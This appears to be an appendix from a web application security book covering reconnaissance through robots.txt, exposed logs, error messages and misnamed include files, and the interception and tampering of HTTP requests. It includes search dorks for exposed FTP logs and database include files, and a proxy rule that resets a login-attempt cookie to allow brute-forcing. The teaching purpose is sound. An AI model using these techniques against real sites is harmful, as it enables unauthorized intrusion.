■ Known vulnerabilities in the operating system or Web server: Although these vulnerabilities certainly are extremely important and must be addressed, it's a fairly mature space that is well understood. In fact, it is so well understood that one could argue that it put "blinders" on the industry, allowing Web application vulnerabilities to grow and grow with little mitigation until only recently.

The Uniqueness of Web Application Security

The differences between Web application vulnerabilities and known server vulnerabilities deserve further discussion. When people talk about vulnerabilities (and vulnerability assessments in particular), the majority of the industry deals with "known vulnerabilities" that homogeneously affect every install of the particular version of the affected software. This allows for several luxuries in dealing with these types of vulnerabilities:

■ When a vulnerability is announced, everyone becomes aware of the vulnerability at the same time. Not all vulnerabilities that are discovered are announced, however.
■ Everyone is affected by the vulnerability in the same manner, allowing for a single solution to be applied, usually a software patch from the software manufacturer.
■ Since the vulnerability is identical across the board, a single "signature" of it can be created and applied to any number of scanners, firewalls, or intrusion detection devices.

In contrast to these network or OS vulnerabilities, most Web application vulnerabilities aren't "known" vulnerabilities. Since they exist in the Web application, which is almost always custom written, they are unique to that application. Of course, the technique or methodology might be well known (as SQL injection is well known), but not every Web application will be vulnerable to a certain technique, and even the ones that are will be vulnerable in unique areas in different ways.

This has a real impact on how you deal with Web app vulnerabilities; since they're your own custom-built vulnerabilities, you have to deal with them yourself. This means:

■ You won't receive a vulnerability announcement about them.
■ You won't find them indexed in tomes such as Mitre's CVE database or the SANS Top 20 list.
■ These vulnerabilities can exist on any platform (combination of OS and Web server) and can exist regardless of the security of the platform itself.
■ You won't be able to rely on a vendor patch. Again, this is your software, not COTS, so there is absolutely no leveraging the homogeneous environment.

The exception to these rules is "off-the-shelf" Web applications such as PHPNuke, DotNetNuke, or any number of COTS Web software packages. When you're using a "canned" Web application, the benefit of a homogeneous environment does exist. Of course, the second these applications are modified in the least, they become custom software, and they're almost always modified to some extent.
Web Application Vulnerabilities

Remedying Web application vulnerabilities is not particularly difficult. The challenge instead is that of awareness and testing. The channels through which developers are taught and trained conspicuously lack security awareness, and developers are often taught standard techniques that yield insecure code. It is important to point out as well that the majority of Web applications have not been adequately tested for security, if tested at all. The majority of testing on applications is geared toward functionality and performance, which also means that most developers tend to code to those two standards. Only in the last few years have comprehensive scanning solutions been available for testing Web application security. Aside from those few scanners, most of the tools available are either for manual testing or automated for only a tiny portion of what must be tested. This means that most security testing has relied on either penetration testing or code reviews, both of which require significant expertise and are rarely conducted as frequently as necessary to ensure the ongoing security of the application.

Regardless of the reasons, Web application vulnerabilities abound, and this risk is just now being realized. Compared to many forms of hacking, Web application hacking is an extraordinarily easy discipline. Many people who have no clue how to exploit the numerous buffer overflows that are being constantly discovered can skillfully identify and exploit Web app vulnerabilities. Obviously, as this security space matures, the hacking will become less fruitful, but the fact of the matter is that Web hackers have a number of advantages:

■ Web app vulnerabilities get their own rule on the firewall: "Allow HTTP and HTTPS from any source."
In fact, in most firewalls, it's probably the very first rule.²
■ This is a difficult area to effectively and properly monitor with an intrusion detection system. As such, it is rarely monitored properly, if at all.
■ Few tools are required. Many vulnerabilities can be discovered and exploited right from a browser. Those that can't simply require a minimal tool set, typically just a proxy that exposes the raw HTTP packet.
■ Web application vulnerabilities are so easy to discover that people can actually find "opportunity hacks" with a search engine, although we'll discuss the limitations of this approach as it pertains to actual Web application assessments.

As a result, Web applications can be exploited left and right. When you really think about it, this shouldn't come as a surprise. After all, if multibillion-dollar software companies have trouble securing their software, why wouldn't smaller, lesser trained shops with significantly less access to resources have the same problems? The answer, of course, is that their software (the Web applications) is just as insecure; these companies just don't realize it.

Web application vulnerabilities exist in many areas, and understanding those areas is critical to understanding Web app sec. The Top 10 Web Application Vulnerabilities list by the Open Web Application Security Project (www.owasp.org) is perhaps the oldest and most established list of Web application vulnerabilities. It's often cited in papers and Web sites and is a great place to start learning the various types of Web application threats. However, it's not an attempt to enumerate and classify all possible vulnerabilities; it's a running list of what the project members perceive to be the most important Web application threats at the time of writing, much as is the SANS Top 20 list.

There are documents that attempt to classify the full realm of Web application threats.
The OASIS WAS Vulnerability Types and Vulnerability Ranking Model does an excellent job of organizing vulnerability types into a model that is particularly useful for referencing very specific issues. Likewise, the Web Application Security Consortium (http://www.webappsec.org) published its Threat Classification paper as an organizational model as well. Read both papers, as well as other sources, to learn the sum total of Web application threats out there. (Some resources are listed at the end of this chapter.) Here is a sample of some general types of Web application vulnerabilities:

■ Authentication issues: These refer to things such as login mechanisms, preventing password theft through mechanisms such as "Lost Password" features, and ensuring that all "secure" content actually requires authentication. This area has received a lot of attention over the years, and some fairly standard practices have evolved, though they are often debated.
■ Session management: This is a very important area, dealing with problems such as preventing session spoofing by predicting credentials (i.e., session IDs) and ensuring that application features that require higher access properly check the authorization level of the user. Several recent publicized hacks were the result of weak session management.
■ Command injection: These are the result of the application accepting input from the browser (whether it's input that the user typed in or input that the programmer passed from a previous page) that allows the attacker to insert commands and execute them. These commands can range from database queries (such as in the case of SQL injection) to JavaScript (as in cross-site scripting) or even actual system commands. The impact of these is often devastating. Note that command execution is not limited to system commands; even just the ability to insert HTML into a page could be used to hack successfully.
■ Information disclosure: There are lots of clues in Web sites that help a hacker, from HTML comments to finding complete software manuals on the system (yes, this happens all the time). Although any single incident of information disclosure by itself is rarely useful for a complete hack, these incidents often have a damaging cumulative effect.

Note that this is by no means a complete list of all possible Web application vulnerabilities; it is merely a start. Web applications have the potential to be infinitely complex, and so do their vulnerabilities; be sure to read the papers mentioned in this chapter to learn more about the full scope of vulnerabilities and threats.

For the purposes of this appendix, we'll abstract the issues even higher, relating them to the content and code of the site. What we're labeling as "content issues" are those vulnerabilities that appear in the actual page itself; they are "standalone" vulnerabilities that don't require any real understanding of how the application works. In contrast, "code" issues exist in the server-side code for the page and require actually exercising the logic for that page to see what you can get away with in it. You can use search engines to find symptoms of code-related errors: for instance, certain ODBC errors can be indicative of SQL injection, but to truly determine if the vulnerability does indeed exist (and the extent of it), you have to make follow-on requests with specially formed packets to test it. Even with strictly content issues, a search engine will not expose the full gamut of issues. Search engines crawl and index by very specific rules to ensure that they "play nicely" with Web sites, and this limits the amount of content you can find through them.

Constraints of Search-Engine Hacking

This book has already given a very good picture of exactly what can be found just in the content. But it's important to also understand the constraints of search engine hacking.
Certainly using a search engine will find targets of opportunity, but when you're talking about actually doing a concerted test on a target system, you need to understand that anything you turn up using a search engine is just the tip of the iceberg. To put this in graphical terms, Figure B.1 displays the subset of vulnerabilities that are exposed to Google.

Figure B.1 Only a Subset of Vulnerabilities Is Exposed to Google (diagram; recoverable labels: Code Issues, Unlinked Content)

First, not all sites are crawled by Google. That's hard to believe, but remember that for every public Web application any sizable company has (and has submitted to Google to crawl), many others are either not on the Web at all or are not public Web sites. These could include the strictly internal Web applications within a company or extranets that are external facing but meant for an extremely limited audience.

Even of the sites Google does crawl, not all of each site will be crawled. Google can only follow linked pages, and it doesn't do any guessing at filenames or follow clues to other files. Not even all linked files are followed; certainly those linked with HTML links are, but JavaScript links might not necessarily be followed, and pages that can only be found via a form submission won't be found at all. Additionally, Google politely respects requests not to crawl certain areas, as indicated in the robots.txt file.

All this means that although lots of serious information can be garnered using search engines, this form of hacking is by no means the complete picture of Web application security. In fact, even just in the realm of content there's a lot of information (and vulnerabilities) that a human can find but a search engine would probably miss.

Information and Vulnerabilities in Content

The first thing to realize about content is that it takes many forms.
A typical Web page will obviously contain HTML that is rendered in the browser, but additional information in the page source can be valuable to a hacker or penetration tester. JavaScript, comments, and hidden form fields all yield clues and can even be manipulated to actively test the application. Page-scraping techniques, such as those covered throughout this book, can be used to extend the results of a search to get to this type of data.

However, beyond the page source, a great deal of information is available in the raw HTTP itself: status codes, headers, and post data are all valuable areas that are not exposed in the browser. Typically, a crawl is the starting point to discover as much of the site as possible. Additional work will almost always yield more content to scrutinize; this could be a dictionary attack that simply requests a list of files, or it could involve manually poking around and requesting files. More often than not, it's a combination of the two. Although actual vulnerabilities can be discovered in content, for the most part the biggest value comes in information disclosures.

The Fast Road to Directory Enumerations

Some files save a hacker a lot of reconnaissance work by giving him or her a complete list of additional content to analyze. Some of the most obvious files that yield lots of good directory and/or filenames are the robots.txt file, FTP logs, and Web traffic reports, although obviously others can exist as well. These techniques are all covered in detail throughout this book, but we present them in brief here, firmly placed within the context of a Web application assessment. Of course, even more can be unearthed by examining the raw packets.

Robots.txt

Robots.txt is a plaintext file that tells search engines where they can and can't crawl. This file is always plaintext and is always stored in the root of the Web site, that is, at www.website.com/robots.txt. For this reason, it's a great way to start off your searching.
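To make the idea concrete, here is a minimal sketch of pulling the disallowed paths out of a robots.txt body. It is an illustration rather than a complete parser: the function name parse_disallowed and the SAMPLE text are assumptions made for this example, the sample is fed in as a string instead of being fetched from a live site, and only the User-agent, Allow, and Disallow fields are interpreted.

```python
from typing import Dict, List


def parse_disallowed(robots_txt: str) -> Dict[str, List[str]]:
    """Map each user agent named in a robots.txt body to its Disallow paths."""
    rules: Dict[str, List[str]] = {}
    agents: List[str] = []   # user agents the current group applies to
    in_rules = False         # True once the current group has listed a rule
    for raw_line in robots_txt.splitlines():
        line = raw_line.split("#", 1)[0].strip()   # drop comments
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if in_rules:     # a rule was already seen, so a new group begins
                agents, in_rules = [], False
            agents.append(value)
            rules.setdefault(value, [])
        elif field in ("allow", "disallow"):
            in_rules = True
            if field == "disallow" and value:   # an empty Disallow blocks nothing
                for agent in agents:
                    rules[agent].append(value)
    return rules


# Hypothetical sample text, invented for this sketch.
SAMPLE = """\
User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /catalogs   # worth a manual look
"""

if __name__ == "__main__":
    for path in parse_disallowed(SAMPLE)["*"]:
        print(path)
```

Each path printed this way is a candidate for manual browsing during an authorized assessment; from the defender's side, the same output is a quick inventory of what the site is advertising.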
Robots.txt is a simple file: It specifies a user agent and directories that are either explicitly allowed or disallowed. It is very useful for quickly identifying interesting areas of the application because if a search engine is explicitly told not to search a certain directory, a hacker would certainly want to know why. Take, for example, Figure B.2, in which we see the robots.txt file from Google.com. There are several interesting directory names that search engines have been told not to crawl, one of which is the /catalogs directory. By manually browsing google.com/catalogs, you'll see that this is a beta application that might not have been otherwise detected.

Figure B.2 Google.com/robots.txt (screenshot of http://www.google.com/robots.txt; legible entries only)

    User-agent: *
    Disallow: /search
    Disallow: /groups
    Disallow: /images
    Disallow: /catalogs
    Disallow: /catalog_list
    Disallow: /news
    Disallow: /pagead/
    Disallow: /relpage/
    Disallow: /imgres
    Disallow: /keyword/
    Disallow: /u/
    Disallow: /univ/
    Disallow: /cobrand
    Disallow: /custom
    Disallow: /advanced_group_search
    Disallow: /advanced_search
    Disallow: /googlesite
    Disallow: /preferences
    Disallow: /setprefs
    Disallow: /url
    Disallow: /wml
    Disallow: /bsd?
    Disallow: /mac?
    Disallow: /unclesam?
    Disallow: /answers/search?q=
    Disallow: /local
    Disallow: /froogle?
    Disallow: /froogle

Of course, the robots.txt file has to be manually created, meaning that the system designers should be well aware of the fact that they're advertising those directory names. However, the search results are far more interesting to the hacker when the designers and administrators are not aware of certain directories he or she has located.

FTP Log Files

Log files are also an incredible source of additional directories and filenames to check, as we've seen throughout this book, especially in Chapter 10.
Frequently these are FTP log files, although any type of logging or trace file that's viewable to the public is a liability. FTP logs in particular give the hacker that many more files to look for and can also reveal such things as the system name, client IP address, or even the internal IP address of the system. Think about who FTPs to a Web server: most likely someone with privileges, and if that IP traces back to a residential line, an alternative target comes to light: a system that will probably be considerably less defended but has plenty of access to the Web site. Never allow log files of any type to gather on a server in the Webroot, because they won't attract dust. Figure B.3 shows a quick Google search for a very common FTP log filename. Some of these files were intentionally placed by the administrators, but surely most were not.

Figure B.3 Google Search Results for a Common FTP Log File (screenshot; result banner: Results 1 - 10 of about 255,000 for allinurl:"ws_ftp.log". (0.73 seconds))

Web Traffic Reports

Web traffic reports, explored in Chapter 10, are also a highly valuable source of information to the hacker. These are reports generated by specialized software that analyzes the Web traffic logs to generate easily digestible information about the Web traffic. In particular, most reports show not only the most popular pages but the least popular as well. This almost always presents some interesting areas to be explored. Think contrarian here; if you have a public Web site that takes hundreds of thousands of hits a day, but some pages only take several hundred hits a day, what function do you think those pages play within the Web application? They could be a remote Web-based admin section or perhaps a separate section for customer service representatives to log into and access higher functionality.
Either way, chances are they'll be a good source of information, and in some cases, extreme vulnerabilities can be found in these stats.

HTML Comments

HTML comments are also a great source of information, not just for finding more content but about the system itself and more. Many developers are still leaving "TMI" (too much information) in their client-side comments. For example, some commonly seen ones include:

■ Directory names or filenames
■ References to server-side code
■ Documentation of template pages
■ References to installed applications or systems
■ Revision history
■ Internal names or contact information (many companies use the same naming conventions for their logins as they do their e-mail)

Error Messages

Error messages are another phenomenal source of information, as we've seen throughout this book, highlighted in Chapters 8 and 10. They're all over the Web and often overlooked by untrained eyes. Every error message tells a story, and they're flashing neon signs that say "my site is broken." Hackers will almost always stop to see exactly how broken. These messages can also reveal large amounts of sensitive information such as file system paths, additional content, internal code, and more. Most extremely useful error messages are generated with active testing (tampering with the application), but many can be found with a crawl as well. In Figure B.4, an error message reveals the file system path, along with information about the server-side code.

Figure B.4 Error Message Revealing the Web Root and Other Details (screenshot; legible text follows)

    #cookie.contactid#
    Error near line 27, column 21.
    Error resolving parameter COOKIE.CONTACTID
    The cookie value CONTACTID was not found in the current template file. The cause of this error is very likely one of the following things:
    1. The name of the cookie variable has been misspelled.
    2. The cookie variable has not yet been created or has timed out.
    To set default values for cookie variables you should use the CFPARAM tag (e.g. <CFPARAM NAME="Cookie.Color" DEFAULT="Red">)
    The error occurred while processing an element with a general identifier of (#cookie.contactid#), occupying document position (27:20) to (27:37) in the template file D:\INETPUB\WWWROOT\DISPLAY\...\MEMBERSLISTING.CFM.

Sample Files

Sample files or other commonly used applications such as those revealed in Chapter 8 typically have well-documented vulnerabilities in them. Many sample files are actually remote tools for the developers, and others might simply demonstrate the system's features.

Bad Extensions

Another common mistake that can have devastating consequences is simply misnaming a file extension, as we explored in Chapter 3. Extensions are mapped in the Web server, and this is how the server knows a page is supposed to be executed on the server as opposed to simply sent to the browser. Any page that contains server-side code requires an extension that the server will recognize and will execute. Figure B.5 shows the application mappings for Internet Information Server; here it is clear that the Web server relies on proper extensions to understand how to process a file.

Figure B.5 IIS Application Mappings (screenshot of the App Mappings tab, with columns Extension, Executable Path, and Verbs; the listed extensions include .asp and .asa mapped to C:\WINNT\system32\inetsrv\asp.dll, .shtm, .shtml, and .stm mapped to C:\WINNT\system32\inetsrv\ssinc.dll, the Perl extensions mapped under C:\Perl\bin, and the .NET extensions mapped under C:\WINNT\Microsoft.NET\Framework)

With the wrong extension, the server will simply send the text file to the browser, completely revealing the server-side source code. Unfortunately, many developers have actually been trained to give their files nonexecutable extensions, particularly server-side include files (.inc files). Figure B.6 shows the results of a query asking for a very common filename given to the files that define database connectivity in certain PHP applications. Although the number of hits might sound low, remember that this is only one specific filename, and these all had to be exposed to Google via directory browsing to be indexed. In reality, a huge number of include files with the .inc extension are running in Web applications right now.

Figure B.6 Include Files Are a Common Source of Server-Side Code (screenshot; result banner: Results 1 - 10 of about 147 for intitle:"Index of" "dbconn.inc". (0.35 seconds))

Most dictionary attacks ask for commonly used include files, but this attack isn't limited to include files by any means; any page that contains server-side code that has the wrong extension on it will leak that source code. Likewise, any archive files left on the server (such as tarballs or ZIP files) are subject to download along with their contents, whether HTML or code. Figures B.7 and B.8 show how a copy of a file with an improper extension reveals its source code. Since the extension .bak doesn't correlate with any application mappings, the server doesn't realize that the page is supposed to be executed and performs a "read" operation on it instead, yielding its source code to the lucky viewer.
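From the defender's side, the same problem can be checked before a search engine or a dictionary attack finds it. The following is a rough sketch only, assuming you have local read access to the Web root: the function name find_leaky_files, the EXECUTED_EXTENSIONS set, and the CODE_MARKERS tuple are all hypothetical choices made for this illustration and must be adjusted to match the mappings your own server really uses. The marker check is a simple heuristic and can produce false positives.

```python
import os

# Hypothetical values for illustration; align them with the server's real mappings.
EXECUTED_EXTENSIONS = {".asp", ".aspx", ".php", ".jsp", ".cfm"}
CODE_MARKERS = ("<%", "<?php", "<cf")


def find_leaky_files(web_root):
    """Return files that contain server-side code markers but carry an
    extension the server would send to the browser as plain text."""
    leaky = []
    for folder, _dirs, files in os.walk(web_root):
        for name in files:
            extension = os.path.splitext(name)[1].lower()
            if extension in EXECUTED_EXTENSIONS:
                continue  # the server executes these, so the source is not sent
            path = os.path.join(folder, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as handle:
                    text = handle.read(65536).lower()  # inspect the first 64 KB only
            except OSError:
                continue  # unreadable file; skip it
            if any(marker in text for marker in CODE_MARKERS):
                leaky.append(path)
    return sorted(leaky)
```

Run against a copy of the Web root, a scan like this would flag a display_forum.bak or dbconn.inc file while leaving display_forum.asp alone, which is exactly the distinction the application mappings make.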
Note that although these figures show Active Server Pages running on Internet Information Server, this issue is by no means limited to that platform; this page is chosen merely for the sake of demonstration. These issues exist on all platforms, including Java and PHP applications.

Figure B.7 Revealing Source Code with an Improper Extension

Figure B.8 Active Server Page with the Correct Extension

System Documentation

System documentation of one form or another can also often be found on sites, as we discussed in Chapter 8.
This documentation is usually in the form of Readme files but can also be complete online manuals. Although these might be helpful while developing a system, they do not belong on anything in production. The same can be said for test files. Remember that these are pages where a developer was testing something, and they are usually broken. They tend to slip under the radar of any administrative housekeeping, and the error messages gleaned from them can be amazingly helpful.

These were just some choice examples of frequently occurring issues. Obviously there's no limit to the amount of junk that collects on a Web server over time; chalk it up to poor housekeeping or just "Internet entropy." When you're fishing for files, use your imagination, but naturally, prioritize items that will help you further the testing.

Defending your site from these content issues is easy once you understand the impact even relatively benign items can have. In general, a few basic practices can help mitigate content-related issues:

■ Ensure that all files have a script extension, even if the page contains only HTML. For example, ASP code in an HTML file will not be executed; it will be displayed to the browser. An .asp file that contains only HTML, however, will still serve the HTML fine.
■ Clean up your Web directories. Ensure that only intended pages are present, and delete anything that doesn't belong, especially sample applications. On most systems it's pretty easy to pick out the files that don't belong. When in doubt, ask the developers.
■ Disallow HTML comments in code. Allow only server-side comments. If the page is only HTML and requires a comment, insert a server-side comment within script delimiters, such as:

<HTML>
Text and stuff <br>
More text and stuff and a <% 'server side comment %> that won't make it to the browser.

Of course, this works only if you run everything with a script extension.
■ Be aware of what is transmitted in your cookies and post data. Even though these aren't readily viewable in a browser, they are immediately apparent to a hacker, as we'll see later.

Hidden Form Fields, JavaScript, and Other Client-Side Issues

A large number of mechanisms are available to the developer in client-side code, such as hidden form fields and JavaScript, and there are well-known issues with these as well. For example, many developers use hidden form fields for everything from session identifiers to view state controls. None of these are issues if done properly; the fact that a session ID is in a hidden form field, for example, doesn't make the identifier itself any more or less secure than if it appeared in the URL. However, many developers still believe that hidden form fields are actually hidden from the user. Unfortunately, this couldn't be further from the truth. They are called "hidden" because they don't render in the browser view, but they are quite plainly accessible in the HTML source and raw packets.

In the late 1990s, "client-side pricing" was common: hidden form fields passed the price of an item from page to page in the shopping cart. By simply saving the HTML to disk and modifying it, a hacker could change the price of a product when checking out. Sadly, this exact issue still exists today, though it occurs far less often than it did in the past.

The old-fashioned way of manipulating content was to save the Web page to disk, modify the local file, and use it to submit a modified request to the server. This, however, is a terribly mundane way of going about it. It all gets so much easier when you drill down to the packet level. Additionally, a great deal of information is exposed in the packet that simply isn't available without viewing the raw packet.
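The client-side pricing problem described above comes down to the server trusting a value that the browser sent back. The following is a minimal sketch of the alternative, assuming a hypothetical in-memory CATALOG and form field names (item_id, quantity, price) that are purely illustrative and not taken from any particular shopping cart. The idea is simply that the price is looked up on the server and whatever price the client submits is ignored.

```python
# Hypothetical server-side catalog; a real application would query its database.
CATALOG = {"shirt-blue": 1999, "shirt-red": 2199}  # prices in cents

def order_total(form):
    """Compute an order total from server-side prices only.

    `form` is a dict of submitted form values. Any "price" key it carries
    (for example from a hidden form field) is deliberately never read.
    """
    item_id = form.get("item_id", "")
    if item_id not in CATALOG:
        raise ValueError("unknown item")
    try:
        quantity = int(form.get("quantity", ""))
    except ValueError:
        raise ValueError("quantity must be an integer")
    if quantity < 1:
        raise ValueError("quantity must be positive")
    return CATALOG[item_id] * quantity

# A tampered submission: the hidden price field was edited down to 1 cent.
tampered = {"item_id": "shirt-blue", "quantity": "2", "price": "1"}
print(order_total(tampered))  # 3998
```

Because the submitted price never enters the calculation, editing the saved HTML or the raw packet has no effect on what the customer is charged.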
Before getting into any real code attacks, you have to understand how HTTP packets work and how to manipulate them to submit tampered data directly to the Web application.

Playing with Packets

All communication between the browser and server is done via HTTP requests and responses. HTTP is an application-level protocol wrapped in lower-level protocols, so you don't need to worry about those lower layers here. Every time you load a Web page into your browser, the browser makes multiple requests to the server as it downloads images, scripts, and other elements. When you submit a form, the browser submits the data you've entered, along with any hidden form values and any possible effects of JavaScript, to the server in a request, almost always via either a GET or a POST.

An HTTP GET passes information to the server by appending the information to the end of the page name, as shown in Figure B.9. In a POST request, however, the information is not appended to the URL but is instead submitted in the body of the request packet, as shown in Figure B.10. Many developers believe that POST requests are more secure than GETs because the information is not exposed in the address bar of the browser. In reality, a POST is just as exposed as a GET in the packet and equally subject to tampering. There is, however, one distinct difference between a GET and a POST: data persistency. Anything in a URL (such as querystring information from a GET) can persist in many areas far beyond the Web developer's control.
These include:

■ The browser's history cache
■ The browser's bookmarks
■ Any outbound proxy logs
■ Any inbound proxy logs
■ Any firewall logs
■ Web server logs
■ Web server traffic reports (which read the server logs)
■ Referrer strings, which could actually send the information to a different site

Therefore, it is always a good idea for any Web form to submit via a POST instead of a GET. This is merely to avoid the issue of the data living everywhere, however, and does absolutely nothing to secure the data.

Figure B.9 An HTTP GET Packet
GET /browse.asp?Department=Mens&Aisle=Shirts&Color=Blue HTTP/1.0
Host: www.onlineretailer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040614 Firefox/0.9 StumbleUpon/1.995
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Cookie: Q29L^3JhdHVsV>;Rpb25zlC4LiLiB5b3UgVXJIIHZIcnkgMTMzNw==
Connection: Close

Figure B.10 An HTTP POST Packet
POST /browse.asp HTTP/1.0
Host: www.onlineretailer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040614 Firefox/0.9 StumbleUpon/1.995
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Cookie: eTN^IGwzMzduMzU1IGIzl(3NyJWtJlxNGw=
Connection: Close
Content-Length: 39

Department=Mens&Aisle=Shirts&Color=Blue

In both a GET and a POST, the information is a concatenated string composed of parameter names and the values of those parameters. Some fairly standard delimiters are used to help the server interpret the data, as shown in Figure B.11.

Figure B.11 Components of the URL
/browse.asp?Department=Mens&Aisle=Shirts&Color=Blue
■ The question mark separates the page name from the querystring.
■ Equal signs separate the name of the parameter from the value; together they form a parameter and value pair.
■ Ampersands separate multiple sets of parameters.

By intercepting packets from the browser, you can see all form data submitted, including hidden form field values and the effects of any JavaScript that executed.

Not all information is transmitted via queries and post data, however. A Web application developer has full access to all areas of the packet and will often store information in the cookie or even go so far as to create custom headers to store data. All areas of the packet are subject to viewing and tampering, and performing it at packet level is easy and efficient. Figure B.12 shows a raw request with an interesting cookie being sent to the server.

Figure B.12 An HTTP Request Showing a Cookie Transmitted to the Server
GET /test2.asp HTTP/1.0
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040614 Firefox/0.9 StumbleUpon/1.995
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: Close
Cookie: auth=admin%3Dfalse%26authlevlel%3D1;ASPSESSIONIDASDSAASB=MAKJPIICIEJNGJMEANEPAHGL

Viewing and Manipulating Packets

Before you can begin modifying packets, you have to actually get access to them. As we know, the browser will display only the URL (and any accompanying querystring) and the body (the HTML) of the HTTP response. The only portion of an HTTP request that is displayed is the URL and querystring itself; POST data is not viewable in a browser. There are several ways of viewing the actual raw packets themselves.
The first method that comes to mind for most people is packet sniffing, which will indeed show you the full conversation between browser and server. A favored packet sniffer is Ethereal, pictured in Figure B.13, which displays the packets in an easily read format.

Figure B.13 Ethereal Makes Easy Work of Network Analysis
[Screenshot: The Ethereal Network Analyzer with the display filter set to http.request, listing a series of HTTP GET requests for image files. The detail pane expands the Hypertext Transfer Protocol section of a GET /news/2004/111004.asp HTTP/1.1 request, and the bottom pane shows the hex dump of the same packet.]

Be prepared, however, to sift through a large number of packets because the server response can actually take place over multiple packets. If you're using Ethereal, be sure to take advantage of its filtering and coloring rules to separate the wheat from the chaff.

At some point, you'll need to actually modify the packets, not just view them, and this takes more than a sniffer. There are two broad ways of modifying packets, and both are used extensively. For a "one-off" request, simple Telnet will do the trick; simply Telnet to the server on port 80 (or the appropriate port), type in your packet, and terminate the packet with two carriage returns; the server will respond accordingly. Typing in packets by hand gets old quickly, however, and to perform repetitive tasks you'll want to script out the work.

When nothing but manual tampering will do, nothing beats using a local proxy. Local proxies can be garnered from many sources, but they all basically do the same thing: let you view and modify raw HTTP packets. The real differentiators are in details such as the ability to chain through a network proxy, the ability to use SSL, and the ability to modify response packets in addition to request packets. Most have extremely functional interfaces as well, combining all packets and matching responses to their requests. They work by simply accepting the packet from your browser, displaying the packet to you for modification, then forwarding it to the server and displaying the server response.

By letting the browser make the request for you, all you have to do is modify the area you're interested in. This is extremely efficient in complex applications that can change key areas with each request; now your browser does all the heavy lifting, leaving you free to tweak where desired.
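For the scripted route mentioned above, the request text has to be assembled with the same care as one typed into Telnet: the body and its Content-Length header must agree, and a blank line must separate the headers from the body. The following is a minimal sketch under stated assumptions. The host, path, and parameters are borrowed from Figure B.10, while the function names build_post and tamper are hypothetical and exist only for this illustration. The sketch builds the packet as text and does not send anything.

```python
from urllib.parse import parse_qsl, urlencode

def build_post(host, path, params):
    """Return a raw HTTP/1.0 POST request as text for the given parameters."""
    body = urlencode(params)
    headers = [
        f"POST {path} HTTP/1.0",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        # urlencode output is plain ASCII, so character count equals byte count.
        f"Content-Length: {len(body)}",
        "Connection: Close",
    ]
    # A blank line (two CRLF pairs in a row) separates the headers from the body.
    return "\r\n".join(headers) + "\r\n\r\n" + body

def tamper(body, name, new_value):
    """Return the body's (name, value) pairs with one parameter's value replaced."""
    return [
        (key, new_value if key == name else value)
        for key, value in parse_qsl(body, keep_blank_values=True)
    ]

original = "Department=Mens&Aisle=Shirts&Color=Blue"
request = build_post("www.onlineretailer.com", "/browse.asp", parse_qsl(original))
print(request)

# Changing one value also changes the body length, so the header is recomputed.
modified = build_post(
    "www.onlineretailer.com", "/browse.asp", tamper(original, "Color", "Red")
)
print(modified)
```

The resulting text could be written to a socket connected to the server's HTTP port, which is the scripted equivalent of the Telnet approach; against anything other than a system you are authorized to test, it should stay on the screen.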
Some proxies will even allow you to search and replace packet contents automatically. Figure B.14 shows SPI Proxy configured to automatically remove all Cookie and Referer headers and to modify the User-Agent header. Being able to modify the raw packet automatically is a great benefit. One application we played with had a "maximum login attempts" counter in its cookies; by configuring the filters in the proxy, we automatically reset the counter to the maximum with each request and were able to pound the login fields all we wanted. Of course, just maintaining that count in the client is an issue unto itself.

Figure B.14 Using SPI Proxy to Perform Automated Search and Replace of HTTP Elements
[Screenshot: SPI Proxy session list with its Settings dialog open. The dialog lists search-and-replace rules applied to request headers, with patterns for If-Modified-Since, If-None-Match, User-Agent, Referer, and MaximumLoginAttempts, the last replaced with MaximumLoginAttempts=5555. The response pane behind it shows HTML from cnn.com.]

Once you have the ability to actually modify packets, you're on your way to actively testing for logical vulnerabilities. Unfortunately, there's simply no way to give a full education on all the myriad possibilities that exist in exploiting application logic, for they are as diverse as the applications themselves. In the next section, however, we look at some basic examples of well-known vulnerabilities and exploits.

Code Vulnerabilities in Web Applications

The majority of really serious vulnerabilities in Web applications don't occur at the "content" level per se; they're based on exploiting failures in the logic of the server-side code. These are more difficult to discover because they require actually exercising the application in various ways to determine the behavior of the back-end code.

Client-Side Attacks

When you visit a Web page, the main HTML file comes from that server but can reference elements that are spread across the Internet.
Advertisements, streaming media, images, and other objects are often hosted offsite via caching services that reduce the total bandwidth consumed by the main site. Browsers know to load these within the main page, even though their source is offsite. This behavior, although required for the Web to work properly, can expose the browser to many different attacks known as client-side attacks.

Client-side attacks can occur in many forms; drive-by ActiveX downloads are one example, as is a malicious Java applet on a Web site. These are all attacks from the Web site itself; the owner of the site is attacking its hapless users. Rarely will the owners of these systems engage a penetration tester or auditor! There are, however, plenty of legitimate Web sites that have vulnerabilities that allow a malicious third party to use the sites to attack browsers. Instead of trying to break into an application head-on to get inside and steal sensitive information, these attacks target the users of that application to gain access to information.

Client-side attacks are often carried out through some sort of phishing scam: sending out extremely convincing-looking e-mails that try to attract people to a mock Web site that mimics a well-known real site and then get them to enter their private information into the mock Web site. These scammers typically employ a variety of URL obfuscation techniques to hide their true identity. This type of attack requires no vulnerability in the actual Web application; rather, it is sheer deception. The weakness in this type of attack is that a sharp consumer might notice the suspicious URL, recognizing that it doesn't belong to the real organization.

